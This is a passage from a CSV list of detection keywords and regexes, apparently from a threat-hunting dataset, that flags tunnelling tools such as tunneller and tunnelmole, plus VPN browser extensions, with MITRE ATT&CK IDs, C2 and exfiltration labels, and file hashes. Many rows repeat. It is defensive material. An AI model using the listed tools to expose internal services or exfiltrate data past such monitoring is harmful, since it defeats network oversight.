wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*omdakjcmkglenbhjadbccaookpfjihpa*",".{0,1000}omdakjcmkglenbhjadbccaookpfjihpa.{0,1000}","greyware_tool_keyword","TunnelBear VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*/tunneller.git*",".{0,1000}\/tunneller\.git.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller/releases/*",".{0,1000}\/tunneller\/releases\/.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-darwin-amd64*",".{0,1000}\/tunneller\-darwin\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" 
"*/tunneller-darwin-amd64*",".{0,1000}\/tunneller\-darwin\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-darwin-amd64*",".{0,1000}\/tunneller\-darwin\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-darwin-amd64*",".{0,1000}\/tunneller\-darwin\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-darwin-i386*",".{0,1000}\/tunneller\-darwin\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-darwin-i386*",".{0,1000}\/tunneller\-darwin\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-darwin-i386*",".{0,1000}\/tunneller\-darwin\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-darwin-i386*",".{0,1000}\/tunneller\-darwin\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-freebsd-amd64*",".{0,1000}\/tunneller\-freebsd\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-freebsd-amd64*",".{0,1000}\/tunneller\-freebsd\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-freebsd-amd64*",".{0,1000}\/tunneller\-freebsd\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on 
your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-freebsd-amd64*",".{0,1000}\/tunneller\-freebsd\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-freebsd-i386*",".{0,1000}\/tunneller\-freebsd\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-freebsd-i386*",".{0,1000}\/tunneller\-freebsd\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-freebsd-i386*",".{0,1000}\/tunneller\-freebsd\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" 
"*/tunneller-freebsd-i386*",".{0,1000}\/tunneller\-freebsd\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-linux-amd64*",".{0,1000}\/tunneller\-linux\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-linux-amd64*",".{0,1000}\/tunneller\-linux\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-linux-amd64*",".{0,1000}\/tunneller\-linux\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-linux-amd64*",".{0,1000}\/tunneller\-linux\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-linux-i386*",".{0,1000}\/tunneller\-linux\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-linux-i386*",".{0,1000}\/tunneller\-linux\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-linux-i386*",".{0,1000}\/tunneller\-linux\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*/tunneller-linux-i386*",".{0,1000}\/tunneller\-linux\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*087dae4b718907c400d19d3e497619042ad74036da714be2812ab423e0a86e84*",".{0,1000}087dae4b718907c400d19d3e497619042ad74036da714be2812ab423e0a86e84.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows 
you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*1556d7d7fe7f2342854a24b05c3eca7e593d7e22021c559118c3fde32950bfd0*",".{0,1000}1556d7d7fe7f2342854a24b05c3eca7e593d7e22021c559118c3fde32950bfd0.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*23588b81078e4ce796050b5eb3f87e37be16233d45ca17e222be509445127a3f*",".{0,1000}23588b81078e4ce796050b5eb3f87e37be16233d45ca17e222be509445127a3f.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*2d5d5cd63277002d698485c5a87a51c1c8d520a963ae1c1689c9e6c5c4964c0c*",".{0,1000}2d5d5cd63277002d698485c5a87a51c1c8d520a963ae1c1689c9e6c5c4964c0c.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*4f91e07aba2c4e94121f45cfb8252d2e173d565a4a15faacd7b3fa3f78b0d978*",".{0,1000}4f91e07aba2c4e94121f45cfb8252d2e173d565a4a15faacd7b3fa3f78b0d978.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows 
you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*51921c04f725490abfce3611cef91f602314bb272240d7d4a252bf16a2199154*",".{0,1000}51921c04f725490abfce3611cef91f602314bb272240d7d4a252bf16a2199154.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*5370c48e778806b0676a70e133a32a7ed674ad22545bb61e120198236504245a*",".{0,1000}5370c48e778806b0676a70e133a32a7ed674ad22545bb61e120198236504245a.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*582b8f96d51ff83c2daf3970faa3c141a18dc8b1af0b23a3dc40aee1d04c6702*",".{0,1000}582b8f96d51ff83c2daf3970faa3c141a18dc8b1af0b23a3dc40aee1d04c6702.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*6c23f9dc5552c6286c852faa91236587470efaf28af92c5b4742feac70ffed6b*",".{0,1000}6c23f9dc5552c6286c852faa91236587470efaf28af92c5b4742feac70ffed6b.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows 
you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*6f072e5783a999399690a8fbb7aff14f818746a910165bb7514576bf9ef179da*",".{0,1000}6f072e5783a999399690a8fbb7aff14f818746a910165bb7514576bf9ef179da.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*70bac6ab24591aa3df6592daacec697e11fdf865e3f27b8ccb7fa5a65934d96d*",".{0,1000}70bac6ab24591aa3df6592daacec697e11fdf865e3f27b8ccb7fa5a65934d96d.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*86f182e121994ab7f27c9936c947bf21151dbaa1a2c94640c9b3493e3101c98a*",".{0,1000}86f182e121994ab7f27c9936c947bf21151dbaa1a2c94640c9b3493e3101c98a.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*8bbfc29e4494eaa861f1e8ceea0982279cae939a7cbe4a6606919e07a67b85bc*",".{0,1000}8bbfc29e4494eaa861f1e8ceea0982279cae939a7cbe4a6606919e07a67b85bc.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows 
you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*959dfbb8cd213bd33aa99fcf4494c61397dc39685f43806ddd9804798d4c94cb*",".{0,1000}959dfbb8cd213bd33aa99fcf4494c61397dc39685f43806ddd9804798d4c94cb.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*9f6b80fa0ffaad84c92776eaa2af7a16d5fcb724ac12ed9a07dffd88565c6397*",".{0,1000}9f6b80fa0ffaad84c92776eaa2af7a16d5fcb724ac12ed9a07dffd88565c6397.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*a17972b286ec9492e224a2adcc4ec7487615caec87a04be7d7a1c0bbfc0f0b43*",".{0,1000}a17972b286ec9492e224a2adcc4ec7487615caec87a04be7d7a1c0bbfc0f0b43.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*a857a9f7a34b247348439a6b13dda18e4aafa381eb7d50215610d9d360d68485*",".{0,1000}a857a9f7a34b247348439a6b13dda18e4aafa381eb7d50215610d9d360d68485.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows 
you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*aca3bacd0f7f2a5e75ed74643e1fbb57ec10dc94f675dab12f8d7aeb48c3a503*",".{0,1000}aca3bacd0f7f2a5e75ed74643e1fbb57ec10dc94f675dab12f8d7aeb48c3a503.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*ae4e32d838b180b920722598fa8cc91533742f1bc53805520b372f1f210d6833*",".{0,1000}ae4e32d838b180b920722598fa8cc91533742f1bc53805520b372f1f210d6833.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*b56153a4717acef3981496c1b7612efb801ce9b90ec941f1ebf69026d7fbbe20*",".{0,1000}b56153a4717acef3981496c1b7612efb801ce9b90ec941f1ebf69026d7fbbe20.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*b99def34d979c04dd81857a6ba93e79d8a16bcefecc8f4607e3c1cee097f41c1*",".{0,1000}b99def34d979c04dd81857a6ba93e79d8a16bcefecc8f4607e3c1cee097f41c1.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows 
you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*c3a41b08c2665cc4036b9540ee39aa4a0786ed2416f03fe2ae5429ef303f409e*",".{0,1000}c3a41b08c2665cc4036b9540ee39aa4a0786ed2416f03fe2ae5429ef303f409e.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*ce9e92734048598d84c3ca3a1da32ecdf759e43b3e13716bf0bf91183c7544f2*",".{0,1000}ce9e92734048598d84c3ca3a1da32ecdf759e43b3e13716bf0bf91183c7544f2.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*d49e100ae7518571c6b4953693cc63e975072203787c492f389326ea3b1e988f*",".{0,1000}d49e100ae7518571c6b4953693cc63e975072203787c492f389326ea3b1e988f.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*eefd30efe33687408541ad00fead452f4f341c32fad1a77e84006ae7aa4fbe9a*",".{0,1000}eefd30efe33687408541ad00fead452f4f341c32fad1a77e84006ae7aa4fbe9a.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows 
you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*efa4485dbd9d5813411e35144b17f676459fb681dc67c5a84d61da68f77099f8*",".{0,1000}efa4485dbd9d5813411e35144b17f676459fb681dc67c5a84d61da68f77099f8.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*Launch the client, exposing a local service to the internet*",".{0,1000}Launch\sthe\sclient,\sexposing\sa\slocal\sservice\sto\sthe\sinternet.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*skx/tunneller*",".{0,1000}skx\/tunneller.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*You must specify the local host:port to expose*",".{0,1000}You\smust\sspecify\sthe\slocal\shost\:port\sto\sexpose.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z" "*hoapmlpnmpaehilehggglehfdlnoegck*",".{0,1000}hoapmlpnmpaehilehggglehfdlnoegck.{0,1000}","greyware_tool_keyword","Tunnello VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "* tunnelmole.bundle.js*",".{0,1000}\stunnelmole\.bundle\.js.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*.bin/tmole*",".{0,1000}\.bin\/tmole.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*.bin/tunnelmole*",".{0,1000}\.bin\/tunnelmole.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*/bin/tunnelmole.js*",".{0,1000}\/bin\/tunnelmole\.js.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*/tunnelmole.js*",".{0,1000}\/tunnelmole\.js.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*/tunnelmole-client.git*",".{0,1000}\/tunnelmole\-client\.git.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*/tunnelmole-service*",".{0,1000}\/tunnelmole\-service.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*/tunnelmole-service.git*",".{0,1000}\/tunnelmole\-service\.git.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*\.tmole.sh\*",".{0,1000}\\\.tmole\.sh\\.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z" "*\tmole.exe*",".{0,1000}\\tmole\.exe.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - 
